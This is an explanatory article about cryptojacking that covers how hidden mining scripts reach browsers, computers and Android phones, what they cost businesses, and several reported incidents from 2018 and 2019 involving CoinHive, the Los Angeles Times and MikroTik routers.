Cybercriminals hack devices to install cryptojacking software. The software works in the background, mining cryptocurrencies or stealing cryptocurrency wallets. Unsuspecting victims typically use their devices, although they may notice slower performance or lags.
Hackers have two main ways to get a victim’s device to secretly mine cryptocurrencies:
- By forcing the victim to click on a malicious link in an email that loads the cryptomining code on the computer
Hackers often use both methods to maximize their return. In either case, the code places the cryptojacking script on the device, which runs in the background while the victim is working. Regardless of the method used, the script performs complex mathematical problems on the victims’ devices and sends the results to a server controlled by the hacker.
Unlike other types of malware, cryptojacking scripts do not harm victims’ computers or data. However, they steal computer processing resources. For individual users, slower computing performance can just be an annoyance. But cryptojacking is a problem for businesses because organizations with many cryptojacked systems incur real costs. For example:
- Use the time of support and IT staff to find performance issues and replace components or systems in the hope of fixing the problem.
- Increased electricity costs.
Some cryptomining scripts have worming capabilities that allow them to infect other devices and servers on a network. This makes them more difficult to identify and remove. These scripts can also check if the device is already infected with competing cryptomining malware. If another cryptominer is detected, the script disables it.
In early cases of cryptomining, some web publishers sought to monetize their traffic by asking visitors for permission to mine cryptocurrencies on their site. They positioned it as a fair exchange: visitors would receive free content while sites would use their computers for mining.
Malicious versions of cryptomining – that is, cryptojacking – do not ask for permission and continue to work long after leaving the original site. This is a technique used by owners of questionable sites or hackers who have compromised legitimate sites. Users have no idea that a site they have visited is using their computer to mine cryptocurrency.
The code uses just enough system resources to go unnoticed. Although the user thinks the visible browser windows are closed, a hidden window remains open. Often times, this can be a pop-under, which is sized to fit under the taskbar or behind the clock.
Cryptojacking can even infect Android mobile devices, using the same methods that target desktop computers. Some attacks occur via a Trojan horse hidden in a downloaded application. Or users’ phones may be redirected to an infected site, leaving a persistent pop-unders. While individual phones have relatively limited processing power, when attacks occur in large numbers, they provide sufficient collective strength to justify the efforts of cryptojackers.
Cryptojacking Attack Examples
In 2019, eight separate apps that were secretly mining cryptocurrency with the resources of whoever downloaded them were kicked from the Microsoft Store. The apps are said to have come from three different developers, although it is suspected that the same individual or organization was behind them all.
In 2018, a cryptojacking code was discovered hidden on the Los Angeles Times Homicide Report page. When visitors went to the Homicide Report page, their devices were used to mine a popular cryptocurrency called Monero.
The threat was not detected for a while because the computing power used by the script was minimal, so many users would not be able to detect that their devices had been compromised.
In 2018, cryptojackers targeted the operational technology network of a European water utility control system, severely affecting the ability of operators to manage the utility plant.
This was the first known case of a cryptojacking attack against an industrial control system. Similar to the Los Angeles Times hack, the miner generated Monero.
In early 2018, it turned out that the CoinHive miner was serving on YouTube ads through Google’s DoubleClick platform.
In July and August 2018, a cryptojacking attack infected more than 200,000 MikroTik routers in Brazil, injecting CoinHive code into a huge amount of web traffic.